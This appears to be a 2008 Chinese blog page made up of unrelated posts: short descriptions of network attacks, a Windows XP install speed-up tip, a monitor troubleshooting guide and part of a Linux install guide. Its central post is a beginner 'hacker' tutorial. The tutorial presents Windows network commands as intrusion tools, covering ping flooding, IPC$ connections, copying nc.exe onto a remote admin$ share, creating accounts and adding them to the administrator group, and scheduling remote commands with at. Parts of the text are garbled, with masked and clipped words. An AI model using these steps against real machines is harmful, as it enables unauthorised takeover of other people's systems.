Teardrop:IP数据包在网络传递时，数据包可以分成更小的片段。攻击者可以通过发送两段(或者更多)数据包来实现TearDrop攻击。第一个包的偏移量为0，长度为N，第二个包的偏移量小于N。为了合并这些数据段，TCP/IP堆栈会分配超乎寻常的巨大资源，从而造成系统资源的缺乏甚至机器的重新启动。
PingSweep:使用ICMP Echo轮询多个主机。
Pingflood:该攻击在短时间内向目的主机发送大量ping包，造成网络堵塞或主机资源耗尽。
( Mon, 5 May 2008 22:17:37 +0800 )
Description: Smartdrv.exe文件能将
的一部分模拟成磁盘缓冲以加快文件的存取，所以在DOS下***
时，先运行Smartdrv.exe文件能够大大地提高文件的复制速度。需要说明的一点是，这个程序要使用扩展
，所以运行时还必须事先加载Himem.sys。 如何做呢？首先，利用Windows 98控制面板中的“添加/删除程序”创建一张启动盘。然后在C盘下查找“Himem.sys”，将它拷贝到启动盘上。在启动盘上新建文本文件，加入这样一句：device=himem.sys，保存并将该文件重命名为Config.sys。然后在Windows 98***目录中找到Smartdrv.exe文件，将它也拷贝到启动盘中。 接下来，用创建的这张启动盘启动计算机，在提示符后输入“Smartdrv C+20480”，然后回车（提示：其中参数“C＋”表示把虚拟的缓冲区指定给硬盘C盘，你可以根据自己的要求来设置Windows XP的***位置；“20480”指虚拟缓冲区的大小，单位为KB，一般为物理内存大小的1/3左右）。现在就可以***了，将Windows XP的***光盘放入光驱中，在这里，如果光驱的盘符是F盘，那么我们改变驱动器到F盘的I386目录中，输入“Wi t”并回车，***
之旅就开始了！
命令如下：
F:\cd i386
F:\i386wi t
( Mon, 5 May 2008 22:16:38 +0800 )
Description: 作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧，在DOS窗口中键入：ping /? 回车。在此，我们只掌握一些基本的很有用的参数就可以了。
-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。
-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用，会有更好的效果哦。
-n 定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。
说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如“ping IP -t -n 3”，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的IP。
下面我们举个例子来说明一下具体用法，
这里time10ms表示从发出数据包到接受到返回数据包所用的时间小于10ms，从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统，之所以说“初步判断”是因为这个值是可以修改的。这里TTL=128表示操作系统可能是Win2000。
（小知识：如果TTL=32，则表示目标主机可能是win98；如果TTL=250，则目标主机可能是Unix）
至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可以对别人进行ping攻击……这些就靠大家自己发挥了。
二， tstat
该命令使用TCP/IP上的NetBIOS显示协议统计当前TCP/IP连接，使用这个命令你可以得到远程主机的NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。
-A 这个参数可以得到远程主机的NETBIOS信息，但需要你知道它的IP。
-a 使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS信息。
-n 列出本地机器的NETBIOS信息。
当得到了对方的IP或者机器名的时候，就可以使用 tstat命令来进一步得到对方的信息了，这又增加了我们入侵的保险系数。
三，netstat
这是一个用来查看网络状态的命令，操作简便功能强大。
-a 查看本地机器的所有开放端口，可以有效发现和预防木马，可以知道机器所开的服务等信息。
-r 列出当前的路由信息，告诉我们本地机器的网关、子网掩码等信息。用法：netstat -r IP。
四，tracert
跟踪路由信息，使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径，这对我们了解网络布局和结构很有帮助。
这里说明数据从本地机器传输到192.168.0.1的机器上，中间没有经过任何中转，说明这两台机器是在同一段局域网内。用法：tracert IP。
这个命令是网络命令中最重要的一个，必须透彻掌握它的每一个子命令的用法，因为它的功能实在是太强大了，这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令，键入net /?,回车。
在这里，我们重点掌握几个入侵常用的子命令。
net view
使用此命令查看远程主机的所有共享资源。命令格式为net view \\IP。
net use
把远程主机的某个共享资源影射为本地盘符，图形界面方便使用，呵呵。命令格式为net use x: \\IP\sharename。下面表示和192.168.0.7建立IPC$连接（net use \\IP\IPC$ "pa word" /user:"name"）。
建立了IPC$连接后，呵呵，就可以上传文件了：copy nc.exe \\192.168.0.7\admin$，表示把本地目录下的nc.exe传到远程主机，结合后面要介绍到的其他DOS命令就可以实现入侵了。
net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后，如果发现它的什么服务没有启动，而你又想利用此服务怎么办？就使用这个命令来启动吧。用法：net start servername，如用net start telnet命令启动telnet服务。
net stop
入侵后发现远程主机的某个服务碍手碍脚，怎么办？利用这个命令停掉就ok了，用法和net start同。
net user
查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的，最重要的，它为我们克隆帐户提供了前提。键入不带参数的net user，可以查看所有用户，包括已经禁用的。下面分别讲解。
1，net user abcd 1234 /add，新建一个用户名为abcd，密码为1234的帐户，默认为user组成员。
2，net user abcd /del，将用户名为abcd的用户删除。
3，net user abcd /active:no，将用户名为abcd的用户禁用。
4，net user abcd /active:yes，激活用户名为abcd的用户。
5，net user abcd，查看用户名为abcd的用户的情况。
net localgroup
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中，我们一般利用它来把某个帐户提升为administrator组帐户，这样我们利用这个帐户就可以控制整个远程主机了。用法：net localgroup grou ame username /add。
现在我们把刚才新建的用户abcd加到administrator组里去了，这时候abcd用户已经是超级管理员了，呵呵，你可以再使用net user abcd来查看他的状态，就可以看出来。但这样太明显了，网管一看用户情况就能漏出破绽，所以这种方法只能对付菜鸟网管，但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员，这是后话。
net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面，那么也许就用不到这个命令了。但简单的入侵成功了，难道只是看看吗？我们需要进一步渗透。这就连远程主机当前的时间都需要知道，因为利用时间和其他手段（后面会讲到）可以实现某个命令和程序的定时启动，为我们进一步入侵打好基础。用法：net time \\IP。
六，at
这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序（知道net time的重要了吧？）。当我们知道了远程主机的当前时间，就可以利用此命令让其在以后的某个时间（比如2分钟后）执行某个程序和命令。用法：at time command \\computer。
七，ftp
大家对这个命令应该比较熟悉了吧？网络上开放ftp的主机很多，其中很大一部分是匿名的，也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机（一般都是开了21端口的机器），如果你还不会使用ftp的命令怎么办？下面就给出基本的ftp命令使用方法。
首先在命令行键入ftp回车，出现ftp的提示符，这时候可以键入“help”来查看帮助（任何DOS命令都可以使用此方法查看其帮助）。
大家可能看到了，这么多命令该怎么用？其实也用不到那么多，掌握几个基本的就够了。
首先是登陆过程，这就要用到open了，直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可，一般端口默认都是21，可以不写。接着就是输入合法的用户名和密码进行登陆了。
当提示**** logged in时，就说明登陆成功。
接下来就要介绍具体命令的使用方法了。
dir 跟DOS命令一样，用于查看服务器的文件，直接敲上dir回车，就可以看到此ftp服务器上的文件。
cd 进入某个文件夹。
get 下载文件到本地机器。
put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了，如果可以，呵呵，该怎么利用就不多说了，大家就自由发挥去吧。
delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。
bye 退出当前连接。
quit 同上。 功能强大的远程登陆命令，几乎所有的入侵者都喜欢用它，屡试不爽。为什么？它操作简单，如同使用自己的机器一样，只要你熟悉DOS命令，在成功以administrator身份连接了远程机器后，就可以用它来干你想干的一切了。下面介绍一下使用方法，首先键入telnet回车，再键入help查看其帮助信息。
然后在提示符下键入open IP回车，这时就出现了登陆窗口，让你输入合法的用户名和密码，这里输入任何密码都是不显示的。
当输入用户名和密码都正确后就成功建立了telnet连接，这时候你就在远程主机上具有了和此用户一样的权限，利用DOS命令就可以实现你想干的事情了。
到这里为止，网络DOS命令的介绍就告一段落了，这里介绍的目的只是给菜鸟一个印象，让其知道熟悉和掌握网络DOS命令的重要性。其实和网络有关的DOS命令还远不止这些，这里只是抛砖引玉，希望能对广大菜鸟有所帮助。学好DOS对当好黑客有很大的帮助，特别是熟练掌握了一些网络的DOS命令。
另外大家应该清楚，任何人要想进入系统，必须得有一个合法的用户名和密码，哪怕你拿到帐户的只有一个很小的权限，你也可以利用它来达到最后的目的。所以坚决消灭空口令，给自己的帐户加上一个强壮的密码，是最好的防御弱口令入侵的方法。
( Mon, 5 May 2008 22:02:02 +0800 )
Description:
计算机显示器出现黑屏是用户在使用计算机中经常遇到的问题。其实，只要稍对计算机硬件中主板、CPU、内存、显示卡等几大部件有一定的了解，非元器件的损坏的简单故障完全可以自已动手排除。出现这种情况，你可以按照以下的维修步骤和方法进行分析和简单的维修：
　　一、检查主机电源是否工作
　　电源风扇是否转动？用手移到主机机箱背部的开关电源的出风口，感觉有风吹出则电源正常，无风则是电源故障；主机电源开关开启瞬间键盘的三个指示灯（NumLock、Ca Lock、ScrollLock）是否闪亮一下？是，则电源正常；主机面板电源指示灯、硬盘指示灯是否亮？亮，则电源正常。因为电源不正常或主板不加电，显示器没有收到数据信号，显然不会显示。 　　二、检查显示器是否加电
　　显示器的电源开关是否已经开启？显示器的电源指示灯是否亮？显示器的亮度电位器是否关到最小？显示器的高压电路是否正常？用手移动到显示器屏幕是否有“咝咝”声音、手背汗毛是否竖立?
　　三、检查显示卡与显示器信号线接触是否良好
　　可以拔下插头检查一下，D形插口中是否有弯曲、断针、有大量污垢，这是许多用户经常遇到的问题。在连接D形插口时，由于用力不均匀，或忘记拧紧插口固定螺丝，使插口接触不良，或因***方法不当用力过大使D形插口内断针或弯曲，以致接触不良等。
　　四、打开机箱检查显示卡是否***正确，与主板插槽是否接触良好
　　显示卡或插槽是否因使用时间太长而积尘太多，以至造成接触不良？显示卡上的芯片是否有烧焦、开裂的痕迹?因显示卡导致黑屏时，计算机开机自检时会有一短四长的“嘀嘀”声提示。***显示卡时，要用手握住显示卡上半部分，均匀用力插入槽中，使显示卡的固定螺丝口与主机箱的螺丝口吻合，未插入时不要强行固定，以免造成显卡扭曲。如果确认***正确，可以取下显示卡用酒精棉球擦一下插脚或者换一个插槽***。如果还不行，换一块好的显卡试一下。
　　五、检查其他的板卡（包括声卡、解压卡、视频捕捉卡）与主板的插槽接触是否良好
　　注意检查硬盘的数据线、电源线接法是否正确？更换其他板卡的插槽，清洁插脚。这一点许多人往往容易忽视。一般认为，计算机黑屏是显示器部分出问题，与其他设备无关。实际上，因声卡等设备的***不正确，导致系统初始化难以完成，特别是硬盘的数据线、电源线插错，也容易造成无显示的故障。
　　六、检查内存条与主板的接触是否良好，内存条的质量是否过硬
　　把内存条重新插拔一次，或者更换新的内存条。如果内存条出现问题，计算机在启动时，会有连续四声的“嘀嘀”声。
　　七、检查CPU与主板的接触是否良好　
　　因搬动或其他因素，使CPU与Slot 1插口或Socket 7插座接触不良。用手按一下CPU或取下CPU重新***。由于CPU是主机的发热大件，Socket 7型有可能造成主板弯曲、变形，可在CPU插座主板底层垫平主板。
　　八、检查主板的总线频率、系统频率、DIMM跳线是否正确
　　对照主板说明书，逐一检查各个跳线，顺序为“系统频率跳线——CPU主频跳线——DIMM频率跳线”，设置CPU电压跳线时要小心，不应设得太高。这一步对于一些组装机或喜欢超频的用户有很大用处。
　　九、检查参数设置
　　检查CMOS参数设置是否正确，系统软件设置是否正确。检查显卡与主板的兼容性是否良好。最好查一下资料进行设置。
　　十、检查环境因素是否正常
　　是否电压不稳定，或温度过高等，除了按上述步骤进行检查外，还可以根据计算机的工作状况来快速定位，如在开启主机电源后，可听见计算机自检完成，如果硬盘指示灯不停地闪烁，则应在第二步至第四步检查。 　　上述的检查方法基于显示器本身无电气故障，即开启主机电源后显示器的电源指示灯不亮。若以上步骤均逐一检查，显示器仍不显示，则很可能属于电路故障，应请专业人员维修。
( Sun, 4 May 2008 10:22:23 +0800 )
Description:
一,准备工作: 1,购买或下载红旗Linux桌面版 4.0的***光盘或镜像文件.
下载地址: 2,在硬盘中至少留2个分区给***系统用,挂载点所用分区推荐4G以上，交换区不用太大在200M-600M左右比较适合,文件系统格式不论,反正***过程会重新格式化。 3,记录下你电脑中下列设备型号∶鼠标、键盘、显卡、网卡、显示器。及网络设置用到的IP地址、子网掩码、默认网关和DNS名称服务器地址等信息。 二,***红旗Linux桌面版 4.0 将光驱设为第一启动盘,放入第一张***光盘后重新启动电脑,如果你的光驱支持自启动, 如无意外将出现如下图1
如果不进行操作,在10秒后自动进入下一画面,显示如下图2所示
一启动就能使用鼠标了,比效方便;软件协议,只能选同意,除非你不想***,点击“下一步”出现如下图3所示
选择***类型,一般选“典型***”即可,这里还有一个选择:“恢复系统引导”,它的作用是在以后系统使用中,系统引导出问题时用它进行恢复的.这里先不管它,点下一步,出现如下图4所示
配置分区是关键的一步,搞不好会丢失硬盘有用数据,请小心,有些长期使用Windows的人装不了Linux的主要原因也是因为这一步不懂。如果选“用fdisk程序手工分区(只限专家)”后,点击“下一步”会显示如下图5
用这种方法分区,不直接不适合一般人使用,也不适合我用!于是点击“上一步”按钮,返回到图4画面后,再选择用“用Disk Druid手工分区”,然后点击“下一步”显示如下图6
选择用“用Disk Druid手工分区”即列出各分区的详细信息,一目了然较直观,适合我。我的硬盘有4个分区,而第一个分区已***了Windows 98,我想保留它装双系统。表中列出了硬盘的所有分区,我准备用原系统的D盘和E盘。即用/dev/hda5(4.8G)作挂载点***系统,用/dev/hda6(252M)做交换分区。 在这里我先创建挂载点，挂载点放在/dev/hda5分区即原(D盘)，挂载点创建步骤如下∶点击“/dev/hda5”将其选中,如下图7所示。
然后点击“编缉”按钮,弹出如下图8所示的对话框。
“挂载点”一栏选择“/”,即使用选定分区的根目录,最初文件系统类型为vfat(即现时的文件系统是FAT32)这种格式是Windows系统专用的,Linux的挂载点只能使用ext2或ext3,所以必需改变文件系统格式,选中“将分区格式化成∶”并在其右侧的选择条中选“ext3”,如下图9所示
如果你对自已的硬盘质量信心不足,应同时选择“要检查磁盘坏块吗?”在其前面打勾,然后点击“确定”即可,在分区表中可见到已创建了挂载点,如下图10所示。
图中可见挂载点已定位到/dev/hda5分区,该分区文件系统格式也被标注为ext3,可见挂载点已成功创建。 还要创建交换分区才能进行下一步***，交换分区我选择在/dev/hda6分区(即原E盘)。创建交换分区步骤如下∶在图10所示分区表中点击“/dev/hda6”把它选中,如下图11
然后点击“编缉”按钮,弹出如下图12所示的对话框。
因/dev/hda6是用来做交换分区,所以挂载点一栏不用选,只选“将分区格式化成swap”, 如下图13
选中“将分区格式化成swap”后,挂载点一栏随即标示为不适用。然后点击“确定”即可,显示如下图14
图中可见/dev/hda5分区被标注为swap文件系统格式,可见交换分区已成功创建。可进行下一步***了,在屏幕右下角点击“下一步”按钮,出现如下图15
提示格式化两个分区，点“是”按钮后,显示如下图16,当时并不会对这两个分区进行格式化,在***向导结束后,准备开